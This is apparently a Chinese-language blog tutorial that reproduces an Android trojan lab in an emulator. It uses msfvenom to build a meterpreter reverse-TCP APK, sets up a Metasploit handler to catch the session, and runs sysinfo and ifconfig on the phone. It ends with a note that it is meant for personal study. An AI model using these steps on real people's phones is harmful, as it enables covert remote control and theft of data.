手机木马远程控制复现

1、环境搭建

  本次实验模拟的是msf,所以需要android模拟器，这里使用的是雷电模拟器下载、安装后进行环境配置。

点击设置>找到网络设置:开启网络桥接模式，IP设置DHCP

桥接模式需要驱动支持：点击安装

2、生成后门

  Msfvenom是用来生成后门的软件,它于 2015 年 6 月 8 日取代了 msfpayload 和 msfencode。使用时可以查看参数文档。或者在kali中输入msfvenom -h

MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

启动kali，在终端输入命令：

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.204.158 LPORT=5555 R > hurricane.apk

LHOST=192.168.204.158       //这里LHOST设置成kali的ip
set LPORT 5555       //端口设置成生成木马所监听的端口
run      //命令执行

将生成的文件复制到自己的主机上，然后在雷电模拟器安装：

回到我们的kali，启动metasploit进行攻击。

3、渗透攻击

启动metasploit

msfconsole

metasploit配置及监听:

use exploit/multi/handler     //使用模块
set payload android/meterpreter/reversr_tcp   //设置攻击载荷
set LHOST XXXX.XXXX.XXX.XXXX    //配置kali的IP
set LPORT 5555     //监听端口要跟上面生成木马的端口一样
show options      //查看相关的配置情况 
run         //执行 

在模拟器运行木马，进行监听

4、后渗透

sysinfo     //查看手机信息

---

ifconfig        //查看网络信息

---

可以输入？获取相关的命令进行实验，这次手机木马的实验就算完成了。此文章只用于个人学习分享，在实验时，可以自己用手机测试，不用故意发给别人恶搞。